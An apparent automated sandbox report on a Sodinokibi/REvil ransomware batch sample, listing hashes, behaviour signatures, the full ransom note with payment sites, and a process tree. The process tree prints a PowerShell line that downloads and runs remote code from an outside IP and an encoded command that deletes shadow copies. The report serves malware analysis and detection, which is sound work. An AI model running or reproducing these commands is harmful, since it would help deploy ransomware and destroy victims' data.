Analysis

  • max time kernel
    149s
  • max time network
    62s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    10-08-2020 10:10

General

  • Target

    3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat

  • Size

    217B

  • MD5

    2ab61d56f01d736001ccaac50b4175b3

  • SHA1

    eb1e9c14e901a1dc760cf78c692a5ebc095b6bda

  • SHA256

    db2c20d79fbbbaf8f83bee3506d0a2dfa7bcb5fd1e69be9abcf7c0016f0679ed

  • SHA512

    81c624f718127b9f15c9f5fcc73b8e141263291061054393063974ba20c531574d9bbba856c2b63e0ac40a87067984b82dcd641eadffba3e6b804811bb9316cc

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c

Extracted

Path

C:\0u2zl1sr-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 0u2zl1sr. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2D4524545FFD1B6A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2D4524545FFD1B6A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: PfyHnJl75Cuq6KnQhBHhHH/PiwFfpkd3/ciyEqwHppFBt6JdPQNay2zixNSesImP uVI2sxp2x8vbduiit9XuxYT+KqwyyCMWTp3feQ2N3+x9vba4L8U1yULZTNeixZXx DMaDAE0p+qiRnqxuduFG+/dObq5tkkM/Q/BsqMJeUi9ASzaiESjh4FinfIJXSwqH 2E9ZqWmEImHHpmdd9NmRINBl6VeSma/A/VD/TRkCctGX20+b6hmmvcygDfwvz7a+ +zfJNayKym/bJ28tUcmvJIMuuV3d9ugA5bBG29nnME9a1noqaZ6VsKMk7C0CFoVY CfTNN35dk/JMsE2B8lMVjcQzBYEcLomuyk1VBTXbI+IA2t7CZSDjeREqFTxMmB4c fxa3UIew/JcT+U/bXAf1i8QfmAHvL0oTvmvvLRYj+dIe0cH5wjTnfuVI6noOd67/ G7deSbCIE2r7Zwv0yxXuON9P/1Sk7iLLEo8My2tl+O14uxXrhf3R4YSpEzfvJ/Ju ncVfglzhP0Rgmtd7+ZyWbz5+rIVBN8oXIuSg5GL7jPKUrGf11tiu7jzrDCnCK5NA QNBbb9Fy5+RvIap4T1kK7WQNRulSjiXntOYkLv33eAGEuelYx66M+xnRkW3UQfQG 5bVrylkzFH/3/mLi+QJmmcTmspJeeGN81CvrbaEhtUnkXqyjs4gTOkfrVdaw8gEb XUXDHsLI0hHLv/mavIvH3lvEp5RGz5GMx4ncI/hlJ3TJ5P5KUYwzjyk40mO04WVi oHrwViSlGF43/c3lxxUql2x3lo3uPv7BdaVrH5PomXmWFFTAv27rc6skw0D9Dhse w3xOPxYkYXihnvngT/MOXff2SKuvXo9LLk07nSrNJEzftq6dAqCAct9NbwryZCuZ TluxYrPa5e+bqoTPPE3ihOORAGcSxGY0gCEDF2+4Etn6OprtirjBBziAFCtARWYX o3rGZW3/GBlo/jE5TvWnduDBzX6iENDSLNoLqxmpA8hnekwdKMCCq62bDsAMt86p /TxkOnetDnmUcM2d94ZT2LvRgIpRbgo0FkvXhnF87yzPeoqzxmYOwvrdKaCSYMyX TOY2jDr6DYIdHm8+MClyoMXis2oefqM9y6i+R/Pv4H3a4GyHJbYVfjOBN3gjeM7W 25UdalI/Wt22IxWfU394li23KfrpyRSzTVuqIhMDVX9tN5VPbL5nHilUF1l8+k7c QE2FmAeLJMZPFEZxNxC6E/Lkq9HOB0c9eD50dPPkslRI0dgtGLUhuP9MFjn47phH qP61lYsib2jeyKXNF48yCsiIhac= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2D4524545FFD1B6A

http://decryptor.cc/2D4524545FFD1B6A

Signatures

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:408
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c');Invoke-PJWVUIZXTL;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      PID:640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1500
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:744

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

  • memory/640-8-0x00000000082D0000-0x00000000082D1000-memory.dmp

    Filesize

    4KB

  • memory/640-3-0x0000000007BA0000-0x0000000007BA1000-memory.dmp

    Filesize

    4KB

  • memory/640-10-0x0000000008B50000-0x0000000008B51000-memory.dmp

    Filesize

    4KB

  • memory/640-11-0x000000000A2B0000-0x000000000A2B1000-memory.dmp

    Filesize

    4KB

  • memory/640-5-0x00000000081D0000-0x00000000081D1000-memory.dmp

    Filesize

    4KB

  • memory/640-6-0x0000000008240000-0x0000000008241000-memory.dmp

    Filesize

    4KB

  • memory/640-7-0x0000000008490000-0x0000000008491000-memory.dmp

    Filesize

    4KB

  • memory/640-0-0x0000000000000000-mapping.dmp

  • memory/640-9-0x0000000008C00000-0x0000000008C01000-memory.dmp

    Filesize

    4KB

  • memory/640-2-0x0000000005020000-0x0000000005021000-memory.dmp

    Filesize

    4KB

  • memory/640-4-0x00000000079B0000-0x00000000079B1000-memory.dmp

    Filesize

    4KB

  • memory/640-12-0x0000000009800000-0x0000000009801000-memory.dmp

    Filesize

    4KB

  • memory/640-1-0x00000000734C0000-0x0000000073BAE000-memory.dmp

    Filesize

    6.9MB

  • memory/1500-14-0x00000000734C0000-0x0000000073BAE000-memory.dmp

    Filesize

    6.9MB

  • memory/1500-13-0x0000000000000000-mapping.dmp

  • memory/1500-25-0x0000000009560000-0x0000000009561000-memory.dmp

    Filesize

    4KB

  • memory/1500-27-0x0000000009290000-0x0000000009291000-memory.dmp

    Filesize

    4KB

  • memory/1500-28-0x0000000009B00000-0x0000000009B01000-memory.dmp

    Filesize

    4KB